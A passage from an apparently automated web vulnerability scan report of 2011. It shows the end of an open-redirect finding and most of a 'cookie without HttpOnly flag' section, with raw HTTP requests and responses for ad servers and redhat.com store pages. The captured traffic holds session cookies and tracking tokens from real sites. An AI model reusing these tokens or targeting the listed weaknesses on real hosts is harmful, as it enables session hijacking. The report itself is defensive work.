If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:

Request

GET /r.poptracking?pcid=e0cac655-b276-43e0-a649-96531bf856de&eventid=3&aid=20003&offerid=1363&poolid=116&publisherid=20151&siteid=20151&country=US&qsurl=http%3a//accedad66c3140087/a%3fhttp%3a//www.xhamstercams.com/exports/golive/%3fAFNO%3d1-0-624213-344279%26UHNSMTY%3d458%26DF%3d0%26lp%3d3&h=&firstdelivery=False HTTP/1.1
Host: streamate.doublepimp.com
Proxy-Connection: keep-alive
Referer: http://xhamster.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 15 Aug 2011 18:55:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
P3P: CP="CAO PSA OUR IND"
Set-Cookie: __rtso=1363|2|8/15/2011 11:56:23 AM|42ca7cce-320c-4d84-a796-45706558fe1d; expires=Wed, 14 Sep 2011 11:55:49 GMT; path=/
Set-Cookie: __rtsv=20003_1363_116_20151_0_0_0_0_78d92430-71b3-4e6f-880c-27f86287e9ec_50.23.123.106_--_8/15/2011 11:55:49 AM_CPM_1.0000_1.0000_0; expires=Wed, 14 Sep 2011 11:55:49 GMT; path=/
Set-Cookie: __rtsp=116|2|8/15/2011 11:55:49 AM|False; expires=Wed, 14 Sep 2011 11:55:49 GMT; path=/
Location: http://accedad66c3140087/a?http://www.xhamstercams.com/exports/golive/?AFNO=1-0-624213-344279&UHNSMTY=458&DF=0&lp=3
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 244

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://accedad66c3140087/a?http://www.xhamstercams.com/exports/golive/?AFNO=1-0-624213-344279&amp;UHNSMTY=458&amp;DF=
...[SNIP]...

8. Cookie without HttpOnly flag set  previous  next
There are 113 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



8.1. http://afe.specificclick.net/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://afe.specificclick.net
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?l=12915&sz=300x250&wr=j&t=j&u=http%3A%2F%2Fwww.ask.com%2Fdisplay.html%3Fcl%3Dca-aj-cat%26ch%3D%26ty%3Dimage%252Cflash%26size%3D300x250%26kw%3D%26hints%3D%26target%3D%2F5480.iac.usa.ask.hp.x.x.dir%2F%3Bsz%3D300x250%3Blog%3D0%3Bs%3Das%3Bhhi%3D159%3Btest%3D0%3Bord%3D1313432642380%3F&r=http%3A%2F%2Fwww.ask.com%2F%3Fo%3D0%26l%3Ddir&rnd=200084 HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://www.ask.com/display.html?cl=ca-aj-cat&ch=&ty=image%2Cflash&size=300x250&kw=&hints=&target=/5480.iac.usa.ask.hp.x.x.dir/;sz=300x250;log=0;s=as;hhi=159;test=0;ord=1313432642380?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ug=YMP06JsA7quIjC

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=eb229dc3f898572a25f3b274e23d; Path=/
Content-Type: application/javascript;charset=ISO-8859-1
Date: Mon, 15 Aug 2011 18:26:47 GMT
Content-Length: 648

document.write('<iframe src="http://afe.specificclick.net/serve/v=5;m=3;l=12915;c=171138;b=1014302;ts=20110815142647" width="300" height="250" border="0" frameborder="0" marginwidth="0" marginheight="
...[SNIP]...

8.2. http://afe.specificclick.net/serve/v=5  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://afe.specificclick.net
Path:   /serve/v=5

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /serve/v=5;m=3;l=12915;c=171139;b=1014305;ts=20110815142410 HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://www.ask.com/display.html?cl=ca-aj-cat&ch=&ty=image%2Cflash&size=300x250&kw=&hints=&target=/5480.iac.usa.ask.hp.x.x.dir/;sz=300x250;log=0;s=as;hhi=159;test=0;ord=1313432642380?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ug=YMP06JsA7quIjC; JSESSIONID=eafc440c2493ffe3af4cd0b47975

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=eb23298ece5b80ae456717e9cc54; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Mon, 15 Aug 2011 18:26:49 GMT
Vary: Accept-Encoding
Content-Length: 1490
Connection: Keep-Alive

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><meta name="robots" content="noindex,nofollow"><title>Advert</title></head><body marginwidth="0" marginheight="0" topmargin="0
...[SNIP]...

8.3. https://www.redhat.com/wapps/sso/login.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.redhat.com
Path:   /wapps/sso/login.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wapps/sso/login.html?redirect=%2Fwapps%2Fstore%2Fprotected%2Fpurchase.html HTTP/1.1
Host: www.redhat.com
Connection: keep-alive
Referer: https://www.redhat.com/wapps/store/gwt/com.redhat.www.store.gwt.CheckoutClient/985A97185B87D4EFB4466AD39FCBC09F.cache.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rh_omni_tc=70160000000H4AjAAK; s_ria=flash%2010%7Csilverlight%204.0; s_vnum=1316027200761%26vn%3D1; s_vi=[CS]v1|2724B704851D0F89-60000130E007A637[CE]; www-session-id=8ccce98baea8ecd121b0a86afe4a630d; rh_store=ver%3D1.4%3Bline%3DRH0844913%3A1%3Astrue%3Ad1313435219589%3Ad1344971219589%3A-1%3Acnull%3Afalse%3Anull; s_cc=true; s_nr=1313435291617; s_invisit=true; s_sq=redhatglobal%2Credhatcom%3D%2526pid%253Dhttps%25253A//www.redhat.com/wapps/store/cart.html%2526oid%253Dhttps%25253A//www.redhat.com/wapps/store/cart.html%252523nolink%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 7488
Expires: Mon, 15 Aug 2011 19:09:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 19:09:09 GMT
Connection: keep-alive
Set-Cookie: JSESSIONID=IEriNWxEeecvJQPFhSsTOw**.4b748952; Path=/wapps/sso; Secure

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>redhat
...[SNIP]...

8.4. https://www.redhat.com/wapps/store/gwt/com.redhat.www.store.gwt.CheckoutClient/985A97185B87D4EFB4466AD39FCBC09F.cache.htm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.redhat.com
Path:   /wapps/store/gwt/com.redhat.www.store.gwt.CheckoutClient/985A97185B87D4EFB4466AD39FCBC09F.cache.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wapps/store/gwt/com.redhat.www.store.gwt.CheckoutClient/985A97185B87D4EFB4466AD39FCBC09F.cache.htm HTTP/1.1
Host: www.redhat.com
Connection: keep-alive
Referer: https://www.redhat.com/wapps/store/cart.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=vJIBBYCtDP6oeUXM96-ZwA**.9247cfa6; rh_omni_tc=70160000000H4AjAAK; s_ria=flash%2010%7Csilverlight%204.0; s_vnum=1316027200761%26vn%3D1; s_vi=[CS]v1|2724B704851D0F89-60000130E007A637[CE]; www-session-id=8ccce98baea8ecd121b0a86afe4a630d; rh_store=ver%3D1.4%3Bline%3DRH0844913%3A1%3Astrue%3Ad1313435219589%3Ad1344971219589%3A-1%3Acnull%3Afalse%3Anull; s_cc=true; s_nr=1313435422151; s_invisit=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache
ETag: W/"233680-1312230722000"
Last-Modified: Mon, 01 Aug 2011 20:32:02 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Expires: Mon, 15 Aug 2011 19:09:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 19:09:26 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=vJIBBYCtDP6oeUXM96-ZwA**.9247cfa6; Path=/wapps/store; Secure
Content-Length: 233680

<html><head><script>var $gwt_version = "0.0.0";var $wnd = parent;var $doc = $wnd.document;var $moduleName, $moduleBase;var $strongName = '985A97185B87D4EFB4466AD39FCBC09F';var $stats = $wnd.__gwtStats
...[SNIP]...

8.5. https://www.redhat.com/wapps/store/protected/purchase.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.redhat.com
Path:   /wapps/store/protected/purchase.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wapps/store/protected/purchase.html HTTP/1.1
Host: www.redhat.com
Connection: keep-alive
Referer: https://www.redhat.com/wapps/store/gwt/com.redhat.www.store.gwt.CheckoutClient/985A97185B87D4EFB4466AD39FCBC09F.cache.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=ZMw58E0hOGt6QhgfU0v9Og**.9247cfa6; rh_omni_tc=70160000000H4AjAAK; s_ria=flash%2010%7Csilverlight%204.0; s_vnum=1316027200761%26vn%3D1; s_vi=[CS]v1|2724B704851D0F89-60000130E007A637[CE]; www-session-id=8ccce98baea8ecd121b0a86afe4a630d; rh_store=ver%3D1.4%3Bline%3DRH0844913%3A1%3Astrue%3Ad1313435219589%3Ad1344971219589%3A-1%3Acnull%3Afalse%3Anull; s_cc=true; s_nr=1313435291617; s_invisit=true; s_sq=redhatglobal%2Credhatcom%3D%2526pid%253Dhttps%25253A//www.redhat.com/wapps/store/cart.html%2526oid%253Dhttps%25253A//www.redhat.com/wapps/store/cart.html%252523nolink%2526ot%253DA

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Location: https://www.redhat.com/wapps/sso/login.html?redirect=%2Fwapps%2Fstore%2Fprotected%2Fpurchase.html
Content-Length: 0
Content-Type: text/plain; charset=UTF-8
Expires: Mon, 15 Aug 2011 19:07:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 19:07:16 GMT
Connection: keep-alive
Set-Cookie: JSESSIONID=vJIBBYCtDP6oeUXM96-ZwA**.9247cfa6; Path=/wapps/store; Secure


8.6. http://a.tribalfusion.com/j.ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j.ad?site=pubmaticae&adSpace=audienceselect&tagKey=1532170383&th=35348227670&tKey=undefined&size=1x1&flashVer=10&ver=1.21&center=1&url=http%3A%2F%2Fads.pubmatic.com%2FAdServer%2Fjs%2Fsyncuppixels.html%3Fp%3D25273%26s%3D25281&f=2&p=13688099&a=1&rnd=13695087 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/HostedThirdPartyPixels/TF/ae_12232010.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=a9nuJts2aFvDAJsbYI7GmZbtr3jXXDntgvTsHymjdZcwZcZafb5C1WurhOLDJMncTFeSuHrZaEIYVBqqpT06MsySZboEAE0XMGXWUbpaU4eGZbE2abr

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=avnxnXtMPm4bTgUpMCGc2YOEj2XKltO4jhQcP1arcbEyMnUn051cmZbBAfNvcFmZdqjiMyJgTWfGqCq9bwGDtKZdLIbKcvtmfyE8Q9DsroiBfET5IbIcxZdqAJZbqrDSbnQMZaoxJY; path=/; domain=.tribalfusion.com; expires=Sun, 13-Nov-2011 18:41:38 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 220
Expires: 0
Connection: keep-alive

document.write('<script type="text/javascript" language="JavaScript">\r\nvar img = new Image();\r\nimg.src = "http://image2.pubmatic.com/AdServer/Pug?vcode=bz0xJnR5cGU9MSZjb2RlPTE4MzImdGw9MTU3NjgwMA==
...[SNIP]...

8.7. http://a2.mediagra.com/b.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a2.mediagra.com
Path:   /b.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b.php?s=13 HTTP/1.1
Host: a2.mediagra.com
Proxy-Connection: keep-alive
Referer: http://xhamster.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.3.2
X-Powered-By: PHP/5.3.2
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Set-Cookie: mediagra:13=S7QysqoutjK2UirOTFGyzrSyMDG0BvOT80pAfCPrWgA%3D; path=/
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 740
Date: Mon, 15 Aug 2011 19:05:49 GMT
X-Varnish: 1909287838
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><title>xHamster's banner systems</title><script language='javascrip
...[SNIP]...

8.8. http://a5.mediagra.com/b.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a5.mediagra.com
Path:   /b.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b.php?s=13 HTTP/1.1
Host: a5.mediagra.com
Proxy-Connection: keep-alive
Referer: http://xhamster.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.2
Date: Mon, 15 Aug 2011 18:55:55 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.6
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Set-Cookie: mediagra:13=S7QysqoutjK2UirOTFGyzrQyMjS2BvOT80rAfOtaAA%3D%3D; path=/
Content-Length: 838

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><title>xHamster's banner systems</title><script language='javascrip
...[SNIP]...

8.9. http://ad.turn.com/server/pixel.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /server/pixel.htm?fpid=1&sp=y HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=25273&s=25281
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=MMbe9F8c4vIW12sLi2dyci4DUN53kixla9Hhjy6Hzs_faqaDzVRu9ZiuBStYaftYXKB5GtYFP05Zh2SBlosu53bZWjGN2gF2ncsnwOMOSJtfhxpxCVZWo-G8JZeL2-AGEoXq-gPE5Ffs4A1KWdSJ3Xy4T1NZSHp0kR7yTyJ9_irGpAX7uMSqUeH6p4KGvUSZUq7OWife1h2M6Ewfw7GonRDoQNluocXO_kLxCO03TeEqGbRc_WXZLv6_wjPrFYWkRzoy0KsqvLYpwqlgKHkKO7v2cs61vb5d-EUL-mztoUL_BJuqMxnf5kZ4bjzPPBBZl4sOJ1mrC2iEDyk-G34KEYEk4UmX8i4vUYPBL0RbR7ivEzlzFI00MzI2gY6ItzbVOxkr-OO3w_o38FzKCKQ6Lm18jlcUKTrHAgecQO0u_glplHkENwT_vdM5uigT02Pno0_YmxEDTDUEKIRIqGJPfQHDMdsELscQY0iJG8ZU5Ty4GWWGARMuC9OfaFsrmvfxq63JmDsLJ-8CJbf3hY5BZTnskYqZuO4nCGPJTpDqDm8qnTQbufGXlJIhj71lBYrfro1Hb-oXI0uLH1BPomVksC8KUj7e-F2aqqZc87ofCVk5wAQqn5t3ldANs6bZF2YSHOwEyK_UcWlZltoKH3xiIIu2yhXmnBsviwnJ85Ed5aDevF_SkTMMXcVeFMc5tN7pEoXq-gPE5Ffs4A1KWdSJ3Q4zLI5CWlqCgjtHPoLh-sXGpAX7uMSqUeH6p4KGvUSZHjMTXkaAxWETmff6p0CCynXm2SuS6NlYI5OxjuXgTRgqGbRc_WXZLv6_wjPrFYWkMvMzV1KQ715fKlLs1_1zzbv2cs61vb5d-EUL-mztoULKnruFIQYKaPiMC6W5UbDg9o6CAsQCwtFM5Y7fkjHOf4Ek4UmX8i4vUYPBL0RbR7j4K5R2t8-fqw2RIN4cjypIOxkr-OO3w_o38FzKCKQ6Lm9OMIDolQH9GFZKykykhOdYuuYQv45PXfKbyz1md1g8UsEbRg4Tfn8hxcnJGDABTDQg-QbKO_N-vuvZwJz7zYy4GWWGARMuC9OfaFsrmvfx0H_cdrflarr8ERICfjtlnMaI-JJ-NoWyQaFab98q1_Zde4x4nJg09oak0s1lJ4ym7ev_sVYKpHwxGAloIhjxMC8KUj7e-F2aqqZc87ofCVmnzve-Elt6O9TGUTxKZTBDxZ1J_E_O522Ye9lt1xgY0vLOThBfDZko64vFQpO0eVCqoq3BB-vp9ASgk-DDEv5NEoXq-gPE5Ffs4A1KWdSJ3YkYFaBQ79ulBTTMuVNwWn3GpAX7uMSqUeH6p4KGvUSZ3RVmoAwX5pfOPJTb-2FpLb7Z-GfN3yPWx-jWv5rm4mEqGbRc_WXZLv6_wjPrFYWkyKtTKK2UqCBv6H_FflpgYCoZtFz9Zdku_r_CM-sVhaS0nQLPgJd6gPto5vjI1Iutu_ZyzrW9vl34RQv6bO2hQjR2INxqcXhOvUTMwnimoVBQpW6dPdstvKpYA_5893LwgSThSZfyLi9Rg8EvRFtHuFTmVUFnn6bwcz39Ym9oMKo7GSv447fD-jfwXMoIpDou0ugi34ufxqKqsc2Mtte3vDgsGMLzbiZOc-I9zjgk_f5CTby2R7XeohKUqfT7N4kH74DpXFuxI1x9y7A3NcO-1bgZZYYBEy4L059oWyua9_EGuwwMAO-MRya4QZsSn3WqHZgbJN9gHWpQZmXYTZVCh268txBWlhf05t9RfUxfrO34VPOmHtYwp1RxCIl5yWqeLwpSPt74XZqqplzzuh8JWX8dvgjNu-gFIbxMLQKtBeIkehFMwCZGLm7BQMVlkV7KMHND2CdcMnagwF9Vx8tumZRJ3v98564jan5uyPa9LugSher6A8TkV-zgDUpZ1Ind6uHY3YR3riZA9dOzPsOrYMakBfu4xKpR4fqngoa9RJmO-wf97hezQkM4wyW5iQ-RwGxxKFq0JdDSCdP6YGujVioZtFz9Zdku_r_CM-sVhaSQsI4YtVNSaSHRo1z9-PfFu_ZyzrW9vl34RQv6bO2hQkroMkUaOOyDc-lCYw8p-jSqRRyCZjuk9zFxsj37s0Fl_4mvLB_-8Y5Oms5Uqh6HCnJ-BDkP0Hb-ZaXldXPIHPA7GSv447fD-jfwXMoIpDouZbh2dC73BhWw8_b5-6kKe4AFC-iivcKjHCCWpb_i39hSwRtGDhN-fyHFyckYMAFMTOpPWKF2Ax6b7rOHxcXUA7gZZYYBEy4L059oWyua9_H8iF8HDsCRa-9-pUq8YCKwIu4nZMWVWrFcRDFtuQymYUD1RI5tHbziFyffCyec3xFVtvCxutmhKQqI4rynX8EbVOORQ_Ko6kwNCBF1JosDuIx-MGxw6860Zgp9LuiZKfd1THLpKtTKl9Hy-9LIdrTwPkUCHIDocT4HwntaBwSiXVmGe8cmYxtGs87jVjdcUhR6Tm5A3Jl0kkCygktzwY_P2nBq1MLiym4M8a84WNRVyL5tM47YBQRfKyY2Al1gOQ0csSdIeEjo1eTSJN1N1te4P8bndmlf8vcwmNoTNcAkVr8qAbRUJoFNsCnHeEAnBhu_KgG0VCaBTbApx3hAJwYbvyoBtFQmgU2wKcd4QCcGGwUPlrOdmMzuy-JVRLC61VUc_XVxSdq289R16FkEIpjxHP11cUnatvPUdehZBCKY8Rz9dXFJ2rbz1HXoWQQimPE_-4For9FCpvxRN9dPDdyfl4wgPrBWlfpoT64Vvf0QcbqNueryT6Q6nKR3xMwJa0y93McaV8JWnaOstbjjF26BF-Apr4mvzveDGnJv-5a0H-QPevsbWEmzJkKeA3Bjf1Y3sUDNtNXvnuxxIfpNVPjsN7FAzbTV757scSH6TVT47DexQM201e-e7HEh-k1U-Ow3sUDNtNXvnuxxIfpNVPjsIL8XR7E1wpkwV56j-0nTlSXVNEmg3EUswsQW8uB2bCoOaoqpfRx3Z8kq8nb8bONUU_y0sy650wRcNU3FpSuXZVP8tLMuudMEXDVNxaUrl2VT_LSzLrnTBFw1TcWlK5dlU_y0sy650wRcNU3FpSuXZWmxU5qvbFVYpvnHYeM98xyM8qRGj8_sQ9Sn73gM-wC5jPKkRo_P7EPUp-94DPsAucyfOw79Fc-70_uTw3s0QiME_97mGKY6_98ewthfpB1rBP_e5himOv_fHsLYX6Qda4guCjZVrDggv46FtK20_Qz7Tuu1boe16PNcOFeNeN5C-07rtW6HtejzXDhXjXjeQmvybiTcE5o1p8VWzBVvNto; fc=_rPwyhtVWelLo9w8DEY9_lAHjwFtIvCqbMQSJ9jL5-FWFlt1l3kRMakuAXIQEbJ_NS-bcQhrOad4QJ1GnWK2ezeoq1NiKoT_dgJhMqoQ2e-iZpdh_q1bBpHenL6WAlOydHJF1CbuvE8l0lnSvDlQbUGQ3KO8-Xa4sNWyeZuC_Jo; pf=didDAAwXT27__r8LS9I2zEDxpSfL7IM1u56Bwn-p5lIbT6x9-XWYSjdy1isJgNTBqQxXSeAmQm9ZpwC4nbV5xMWPSU-hLNIcjpFuaPM_j1j1XJ-dEQgnYOgQTFPo1-eM9SDRceAzeZk52c4DamEdg7XFKT7txTFzsq66plXaF8wy-s2FUWUfxjDJSsUchQ9wueBMXqZax6H_I76jdSqObugcyKCm2M0l5XO-Qzx43cg6tYdo2m7e8Gc41LCSpWYs0RM0bon_RXV1dcM6lDF-Er25L7T9Plwhsq3bO8k4sEzMek-j2501dhLrTRU7UI1geo8cfzenAcgONGPxADQWUg; rrs=3%7C6%7C9%7C4%7C1002%7C18%7C1008%7C1%7C4%7C7%7C10%7C13%7C1003%7C1006%7C2%7C5%7C1001%7C1004; rds=15195%7C15195%7C15195%7C15201%7C15195%7C15195%7C15195%7C15195%7C15195%7C15195%7C15195%7C15195%7C15195%7C15197%7C15195%7C15195%7C15195%7C15195; rv=1; uid=3041410246858069995

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3041410246858069995; Domain=.turn.com; Expires=Sat, 11-Feb-2012 18:26:13 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:26:12 GMT
Content-Length: 342

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3041410246858069995&rnd=4165358895193705353&fpid=1&nu=n&t=
...[SNIP]...

8.10. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/1313433976**  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/1313433976**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

